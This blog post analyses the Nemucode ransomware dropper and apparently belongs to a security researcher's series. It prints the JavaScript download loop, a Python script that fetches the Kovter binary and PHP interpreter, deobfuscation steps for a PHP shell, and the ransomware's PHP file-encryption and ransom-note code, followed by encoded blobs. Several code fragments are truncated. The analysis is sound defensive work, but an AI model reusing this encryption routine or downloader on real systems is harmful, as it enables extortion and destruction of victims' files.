The analysis in part II is the ongoing analysis from part I blog post. If you haven’t had a chance the read through part I, I would highly encourage you to do so before going through part II. Going through part I first will give you the information that you need to understand the bigger picture of this attack vector. That said, I have attempted to make each part in the analysis independent from an analysis perspective so you don’t have to rely on any previous parts. In this blog post, I will cover the analysis of the Javascript output file that we deobfuscated in part I. This Javascript is the Nemucode ransomware and it contains many components and require an entire blog post as you will see and read below. In this blog post, I will attempt to explain how some additional files are downloaded and executed on the affected system by the Nemucode ransomware. Among these files are the Kovter binary file and PHP interpreter executable and DLL files. The PHP interpreter executable file is used by the ransomware to run an obfuscated PHP shell on the victim system. The operation of this PHP shell will get covered in three sections of this blog post. Finally, I will include some indicators of compromise (IOCs) at the end of this report. Please note that I will also follow up with blog post part III in the future to include additional analysis.

Analysis of the Javascript Output File secondoutput.js (Nemuncode Ransomware)

If you had a chance to read part I, you will see that we successfully received a new Javascript output file after changing the eval function to console.log and then running the Javascript file using NodeJS. The MD5 hashing value of this new Javascript file is b2f688a305571215e4f3079af3b601ca.  You can download this Javascript variant from the following online resources:

As mentioned, this is a Javascript that belongs to the Nemuncode ransomware. Once you open this new output Javascript file with a text-editor you will immediately notice that the code inside this Javascript is a bit more complex in nature because it involves all sorts of operations anywhere from downloading new files, running an obfuscated PHP shell, creating new files on the victim system and so on. Let’s go ahead and dissect this file to see what it exactly does. To do this properly, let’s break the analysis down to three analysis sections and explain each section separately. This way, it will make more sense as to what this Javascript does. The following information describes what each section entails:

  • Section 1 – Additional Files Download and Execution
    • This section will cover the process of downloading additional binary files including the Kovter malware into the affected system.
  • Section 2 – Saving Obfuscated PHP Shell to File
    • In this section we will decode this obfuscated shell and look at some of its main functionalities
  • Section 3 – Execution of the Obfuscated PHP Shell
    • This is where we will see how this PHP shell gets executed on the victim system.

Section 1 – Additional Files download and Execution

In this section let’s focus on the download process of additional files by the Javascript. If you look at the content of this Javascript file in a text-editor then you should see the following section:

var ld = 0; 
var cs = String.fromCharCode(92); //This is the string value of this char '\\'
var cq = String.fromCharCode(34); //This is the string value of this char '"'
var ll = ["","","","",""]; 
var ws = WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2"; 
var pd = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"php5.dll"; 
var xo = WScript.CreateObject("MSXML2.XMLHTTP"); 
var xa = WScript.CreateObject("ADODB.Stream"); 
var fo = WScript.CreateObject("Scripting.FileSystemObject"); 
if (!fo.FileExists(fn+".doc")) {  
   var fp=fo.CreateTextFile(fn+".doc",true);  
   for(var i=0; i<15020; i++) {  
      fp.Write(String.fromCharCode(Math.floor(Math.random()*64+20))); };
      catch(er) {};  
      for (var n=2; n<=4; n++) {  
         for(var i=ld; i<ll.length;i++) {  
            var dn = 0;  
            try {  
                b691oiFy2rROgpkHr1JNjd3NQ"+n, false);  
                if(xo.status==200) {  
                   if(xa.Size>10000) {  
                         try { 
                         catch(er) {}; 
                      } else if(n==3){ 
                      } else if(n==4){ 
            }  catch(er) {};  
} else {  
  } catch(er) {}; 

Please note that I have added an indentation in the code above to purposely make it easier for you to review,  read and understand what this section does. In a nutshell, the code in the Javascript above suggest that upon execution, the script downloads and creates the following files on the affected system:

  • 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.exe – PHP interperter fie (could also be named php.exe)
    • MD5: 7a962afc3d437a5046c3ade4ed6e2696
    • VirusTotal
  • 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj22.exe – The Kovter Binary.
    • MD5: 83414daf0fdce7c2bf6f98ca57911a72
    • VirusTotal
    • More about this malware and its operation in the next blog post (part III).
  • php5.dll – PHP interpreter DLL file. This DLL file is imported by the PHP interpreter
    • MD5: 91660c94f9f3283785febcb51cadba4c
    • VirusTotal

For example, the wscript.exe process (Blog post part I explains how to execute the initial Javascript using wscript.exe command) have created the files php5.dll, 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php and 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.exe when it was executed on my analysis system. Figure 1 shows this process:

Figure 1: The wscript process creating multiple files

Th PHP shell file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php will be covered in section 2 of this blog post.

To make things much easier, I have decided to convert all the important sections into a Python script. The content of the Python script is listed below:

import os, sys, requests
import base64
value1 = '000000157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj201075000MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAi78TzT4zY95ZcMDYUN3YozYlf3VsLMEEVLi0M9_EVLAsDOasmgUEv-dXrxE55WK8UX6lFV00U6PTwxMgIfJXmUEND6aoIZoPcpdjxoB99ZZZQqclA7R4eO24-OgMltMFrgUqATmP2G1VArMyi36muwh573z5ymtJ-p1TER9yekK0TtcNpZOSZ_hQXL-qHLqjtgrowHPENtjjBMDxffKGQmaU73Pkz3z35Z1qT29YADuwSvtW8fvC6mzUAr9rRXZlD-aNMjec6YSqlyzpWz5kNOoWu8mbyLI0jG6QaGEYxH60IpOc2b2fLnLw7ebN6bMRNvZWdDK4BQ98kcjvowEVLwIDAQABa51pzaa6WhRlOaAFY5es5ezP6KAlLpyAqe1RkSVFJiV-pIV-3ITa0CQz5dhBAPLjrA7S6nqsr4jvG0bcMb691oiFy2rROgpkHr1JNjd3NQ'
websites = ["", "","","",""]
binaryfilename = '157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2'
phpfilename = "php5"
def main(): 
          #for a domain in each website's array get this domain 
          for domain in websites: 
              print "Downloading from this domain: " +domain 
              enum = 2
              #Starts at 2 and loop through the index of 5 by enum of 1 
              for enum in range(2, 5, 1):
                  #Save output to new file corresponding with the enum value. 
                  if enum == 2:  
                     #Download the Kovter Malware 
                     file1 = open(binaryfilename+str(enum)+".exe", 'wb')  
                  elif enum == 3: 
                       #Download PHP interpreter  
                       file1 = open(binaryfilename+".exe", 'wb') 
                  elif enum == 4: 
                       #Download PHP DLL interpreter required DLL file 
                       file1 = open(phpfilename+".dll", 'wb')
                  #Perform a get request to the compromised website. 
                  ResponseOutput = requests.get('http://'+domain+'/counter?'+value1+str(enum), timeout=15) 
                  if ResponseOutput:  
                     #Get the text content 
                     GetOutput = ResponseOutput.content 
                     #Convert the output to base64 if you don't want to save binary and raw data. #In this case just unmark this line 
                     # GetOutput = base64.b64encode(GetOutput)
                     file1.write(GetOutput) file1.close()
                     enum += 1
       except Exception, error: 
           print error 
           print ('Error on line %s in module %s' % (sys.exc_info()[-1].tb_lineno, __name__)) 
   except KeyboardInterrupt: 

if __name__ == '__main__': main()

Feel free to copy-and-paste this Python script to your text-editor, then save it and you are good to go to run it on your analysis system. However, before you decide to run the script on your analysis system, you should consider the following steps:

  1. Some security professionals don’t like to communicate with remote domains/IP addresses to not “tip-off” the attackers. If you are one of those then you are fine. Keep reading on how to obtain these files.
  2. If you do decide to save this Python file and execute it, make sure that you have proper indentation cause Python won’t run without proper indentation. Don’t worry, this script only downloads the files and doesn’t execute them on your system.
  3. If you still interested in having the files yet, you don’t want to download them directly into your analysis system, then you can simply download them from online resources such as Hybrid-Analysis, ReverseIT or Mlware. In this case just search their MD5 hash value of each file and you should be good to go. In addition, feel free to also contact me and I will be glad to send you the files in a password protected zip file to your email address.

In a nutshell, the Python script contains five domains in an array. This array is equal to the websites variable as you can see in the Python script above. The script goes through each domain in the array in a loop and then attempts to download three files from each domain. The downloaded files are all the same files in all the five domains in the array. My assumption is that the five domains in the array are used as a backup to ensure that the script successfully downloads all the three necessary files required for this attack. When each domain is enumerated, the last char of the value value1 is changed based on the enumeration number. This is how the compromised website knows which file the GET request should receive. If the GET request contains a content value that is not empty (null) then that content is saved to a file relative to the enum value. If you look back at code inside the Javascript again, you will also see that each file is created under the user %TEMP% folder environment. Here are the variables I am referring to:

  • var fn = ws.ExpandEnvironmentStrings(“%TEMP%”)+cs+”157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2″;
  • var pd = ws.ExpandEnvironmentStrings(“%TEMP%”)+cs+”php5.dll”;

Although this is pretty much the main operation in the first section, the first section also suggest that the Javascript creates a document file as you will see next.

Document Creation Process

There is one additional operation in section one and it is a document file creation. If you look at the Javascript code above, you will see the following line:

var fp=fo.CreateTextFile(fn+".doc",true);

The Javascript also creates a document file using random characters. Once this file is created on the system it is executed. I have taken all the required lines in the code and put them together as you can see below:

var cs = String.fromCharCode(92); //This is the string value of this char '\\'
var ws = WScript.CreateObject("WScript.Shell"); 
var fn = ws.ExpandEnvironmentStrings("%TEMP%")+cs+"157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2"; 
var fo = WScript.CreateObject("Scripting.FileSystemObject"); 
var fp=fo.CreateTextFile(fn+".doc",true); 
for(var i=0; i<15020; i++) {  
   var output = String.fromCharCode(Math.floor(Math.random()*64+20)); 

Once again, this file is saved in the user %TEMP% environment folder and an arbitrary string chars are saved inside this document file. Please note, that the script above only creates the file and doesn’t execute it on the system. Thus, you can feel free to run it on your analysis system and try it yourself. In this case, just copy-and-paste the code from above then save it into a Javascript file and run it on a Windows system using the following command:

wscript docfunction.js

I named my file docfunction.js but you can name it whatever you want. Once you have executed this Javascript file, it will create the document file 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.doc in the following locatoin C:\Users\<username>\AppData\Local\Temp. Figure 2 shows an example of the wscript.exe process creating this document file in the user temp folder:

Figure 2: The wscript process creating a document file

Please note that I have not had a chance to determine what this document file is used for in this attack. However, I am sure that there is a reason for the creation of this file so I will ensure to cover it in the next blog post (part III).

Section 2 – Saving Obfuscated PHP Shell to File

If you look through the Javascript file code you will see that there is a large portion of PHP obfuscated code (look half way through the code) that looks like the following:

<?php eval(gzinflate(base64_decode(str_replace("+cq+"COMPAT_MODE"+cq+","+cq+"a"+cq+","+cq+"
t4MeJeHK3//Bc="+cq+")))); ?>");

Please note that I have removed a large portion of the code (where the SNIP SNIP is) because it is very lengthy in size and I don’t want this blog post to get out of end in size. That said, what we can see here is an obfuscated PHP code using strings replacement function, base64 function and gzinflate function. Finally, we can alse see that the PHP shell is getting executed (or evaluated) using the eval function. What we can also see is the variable cp inside the str_replace parenthesis repeating several times. Looking through the code, this cp variable is only located at the very beginning and end of this large portion of this PHP code. This variable value is located at the very beginning of the script as you can see here:

var cq=String.fromCharCode(34);

Essentially, the cq variable is equal the the string value of the 34 char. This strings value equal to ” (double quote).

Deobfuscating the PHP Shell

What we can do in this situation is to simply perform few manipulations for the code to replace the cp variable with double quote (“), then change the eval function to echo and then run it through a PHP interpreter (in a similar way we did in part I running the Javascript via the node command). So let’s go ahead and go through the steps of doing these changes:

  • Copy-and-paste the code portion from this location <?php eval(gzinflate(base64_decode(str_replace(“+cq+”COMPAT_MODE”+cq+”,”+cq+”a”+cq+”,”+cq+”7H all the way to the end of the code K3//Bc=”+cq+”)))); ?> to a new file using a text-editor and then save that to evil.php (you can use any filename that you want). To ensure that you perform this step correctly, the MD5 hashing value of this file should be d5b30d04cea5ef6069652590c64c873a. I uploaded the file to the following online resources for your convenience:
  • Now replace the eval function eval(gzinflate( with the echo function echo(gzinflate(.
  • Now inside the str_replace function at the beginning, change these values “+cq+”COMPAT_MODE”+cq+”,”+cq+”a”+cq+”,”+cq+”7H….. to this “COMPAT_MODE”,”a”,”7H…. look at figure 3 for an after modification example to ensure you have done the same modifications:

Figure 3: Beginning of the evil php file

  • At the very end of this PHP script, change this K3//Bc=”+cq+”)))); ?> to this K3//Bc=”)))); ?> look at figure 4 for an after modification example to ensure you have done the same modifications:

Figure 4: End of the evil php file

  • Now save the output the whatever filename that you want. I named it evil.php.

On a side note, the Javascript creates this PHP file in the user %TEMP% folder and the file name is 157kQhMc2wkprtfCEDBvrTJuUhE6XvfUj2.php (refer to figure 1 for a visual example).

At this point, we can run the new evil.php script through a php interpreter. To do this you will need to install PHP on your system. If you use a Windows OS for analysis, download the PHP interpreter for Windows from here PHP download. If you are using a MAC or a LINUX system, you should have php interpreter installed by default. Otherwise, there are plenty of online resources to guide you through how to install it. Good luck on that!

Ok, so let’s go ahead and run that modified evil.php with php interpreter typing the following command:

php -f evil.php > evil2.php

If you have done these steps properly, your new output file (in our case we named it evil2.php) should have the following MD5 hashing value 550ce19483757cd2cde1b74649d38d7e. I also uploaded this file to the following online resources for your convenience:

Analysis of the Second Round PHP Output File Evil2.php

This PHP file has many commands, arguments and variables. In a nutshell, this file is responsible for performing the following tasks:

  • Accepting command line arguments. You will see what type of arguments in section 3.
  • Running the ransomware functionality encrypting files in the system using a public key. In section 3 you will see how the PHP file gets the public key.
  • Generating additional files like a wallpaper message notifying the victim that his/her files are encrypted and also providing a bitcoin address related to the payment.
  • Communicate with the following remote domains “”, “”, “”, “”, “
  • Running Windows commands like changing the wallpaper and deleting any existing shadow copies to prevent the victim from restoring his/her files on the system.

When you open the file in a text-editor you may not be able to easily understand what the file does without proper indentation and line breaks. Therefor, just take a look at a clean and human readable version of this file in the following online resource unphp. When you look through the code you will see a lot of PHP functionality libraries and other functions at the beginning of the file. However, half way through the file and all the way to the end section of the file you will see the main functionality of this ransomware. I have pasted below the most important functionality of this ransomware:

} $lands = array("", "", "", "", ""); 
$address = $_SERVER["argv"][1]; 
$price = $_SERVER["argv"][2]; 
$keypub = $_SERVER["argv"][3]; 
$cs = chr(92); 
$cq = chr(34); 
$fn = substr($_SERVER["argv"][0], 0, -4); 
function Tree($p) { $s = chr(92); 
if (preg_match("/" . $s . $s . "(winnt|boot|system|windows|tmp|temp|program|appdata|application|roaming|msoffice|temporary|cache)/i", $p) || preg_match("/recycle/i", $p)) return; 
$dp = opendir($p); 
if ($dp === false) return; 
while ($o = readdir($dp)) if ($o != "." && $o != "..") { if (!is_writable($p . $s . $o)) chmod($p . $s . $o, 0777); 
if (is_dir($p . $s . $o)) { Tree($p . $s . $o); 
} elseif (preg_match("/[.](123|602|dif|docb|docm|dot|dotm|dotx|hwp|mml|odg|odp|ods|otg|otp|ots|ott|pot|potm|potx|ppam|ppsm|ppsx|pptm|sldm|sldx|slk|stc|std|sti|stw|sxc|sxd|sxm|sxw|txt|uop|uot|wb2|wk1|wks|xlc|xlm|xlsb|xlsm|xlt|xltm|xltx|xlw|xml|asp|bat|brd|c|cmd|dch|dip|jar|js|rb|sch|sh|vbs|3g2|fla|m4u|swf|bmp|cgm|djv|gif|nef|png|db|dbf|frm|ibd|ldf|myd|myi|onenotec2|sqlite3|sqlitedb|paq|tbk|tgz|3dm|asc|lay|lay6|ms11|ms11|crt|csr|key|p12|pem|qcow2|vmx|aes|zip|rar|r00|r01|r02|r03|7z|tar|gz|gzip|arc|arj|bz|bz2|bza|bzip|bzip2|ice|xls|xlsx|doc|docx|pdf|djvu|fb2|rtf|ppt|pptx|pps|sxi|odm|odt|mpp|ssh|pub|gpg|pgp|kdb|kdbx|als|aup|cpr|npr|cpp|bas|asm|cs|php|pas|class|py|pl|h|vb|vcproj|vbproj|java|bak|backup|mdb|accdb|mdf|odb|wdb|csv|tsv|sql|psd|eps|cdr|cpt|indd|dwg|ai|svg|max|skp|scad|cad|3ds|blend|lwo|lws|mb|slddrw|sldasm|sldprt|u3d|jpg|jpeg|tiff|tif|raw|avi|mpg|mp4|m4v|mpeg|mpe|wmf|wmv|veg|mov|3gp|flv|mkv|vob|rm|mp3|wav|asf|wma|m3u|midi|ogg|mid|vdi|vmdk|vhd|dsk|img|iso)$/i", $o)) { $_SERVER["files"][] = $p . $s . $o; } } closedir($dp); 
} $_SERVER["files"] = array(); 
$stat_drives = ""; 
for ($i = 67;$i <= 90;$i++) { if (is_dir(chr($i) . ":")) { $stat_drives.= chr($i); Tree(chr($i) . ":"); 
} } $stat_files = count($_SERVER["files"]); 
if ($stat_files > 0) { $db = fopen($fn . ".db", "w"); 
foreach ($_SERVER["files"] as $file) { $fp = fopen($file, "r+"); 
if ($fp === false) continue; $trash = ""; 
for ($i = 0;$i < 2048;$i++) $trash.= chr(mt_rand(0, 255)); $key = ""; 
for ($i = 0;$i < 128;$i++) $key.= chr(mt_rand(0, 255)); 
$aes = new Crypt_AES(CRYPT_AES_MODE_ECB); 
$aes->setKeyLength(128); $aes->setKey($key); 
$b = fread($fp, 2048); 
fseek($fp, 0); 
fwrite($fp, substr($trash, 0, strlen($b))); 
fclose($fp); $b = $aes->encrypt($b); 
$rsa = new Crypt_RSA(); 
$key = $rsa->encrypt($key); 
fputs($db, $file . " " . base64_encode($key) . " " . base64_encode($b) . " "); 
} fclose($db); 
$hta = gzinflate(base64_decode("hVTBbtpAED0TKf8wtURPCU6iHiJqLDnYUlAJILAa5VSt7SFeZdlxd9ci9Os7XkBJVZScbM++nffm7fNG9/nDND4/i+6zJPXPPBkmi8V0Mk7yyXwGk3QUpNl4+bTIA3i3MEsesncrj5NZOn9c5UnO1Y14lRv5BwMIu5b5JJ9m8QEahftProdHzrt5+gTFc0mKzCgwWAXg8NWNgm0tHXexbqdwFKxJu8u12Ei1G8JPNJXQIuD952e9qL7+B2WZfQg3t81rECd5ns06yV+isL4+4JtT8CsPVwp21BqoqGw3qJ29gKYmR/yshBOFsGhB6ArI1WhAbhoyTmgHDRpLWihYS8WQLRoE1KXZNQ6rqDBxa6V+BgElbQqphZOkgdasxBDXl6vk8ubq263vnWSry+sbflfPZKSrN3YQhQ2L732sPq8RSKsdbMUOHIFB64h1+In2uqTtFop2BxV6cWQGsFDIc13AmpSiLfBkFpkEGzvc83a0pDoBvUjJeGxQuEPbO+lKkpoplUIHbAoOPa5QVL78bslhXDvHrcLQl8paSD2Qek3hfk+ocRuF7+B+e8g8ntgz3rHgqL9YTsZZP4Ziz2k/ZuOKUEfogG0Peexfx8JnjCvkgzhBye65ml0UVcX22v/Yo36SpststerHn1HMG+QIaOxiwJ4f7O9SoqR+4bPSe4sLQ1uL5gTVdDL78QFRr3ekSmmrFYnKx8u0+u30T+dkcOwQhf7cfe7ir7qwzfdDFPn7iVooheYt3NW7wg4505Y+3Cz/7YrouvKsh58L7Yuj5hDqKOyugP2d0N1HfwE=")); 
$links = ""; 
foreach ($lands as $land) $links.= "<div>http://" . $land . "/counter/?" . $address . "</div>"; 
$hta = str_replace("<%PRICE%>", $price, $hta); 
$hta = str_replace("<%ADDRESS%>", $address, $hta); 
$hta = str_replace("<%LINKS%>", $links, $hta); 
$fp = fopen($fn . ".hta", "w"); 
fputs($fp, $hta); 
$fp = fopen($_ENV["APPDATA"] . $cs . "Desktop" . $cs . "DECRYPT.hta", "w"); 
fputs($fp, $hta); 
$fp = fopen($_ENV["USERPROFILE"] . $cs . "Desktop" . $cs . "DECRYPT.hta", "w"); 
fputs($fp, $hta); fclose($fp); 
$bmp = gzinflate(base64_decode("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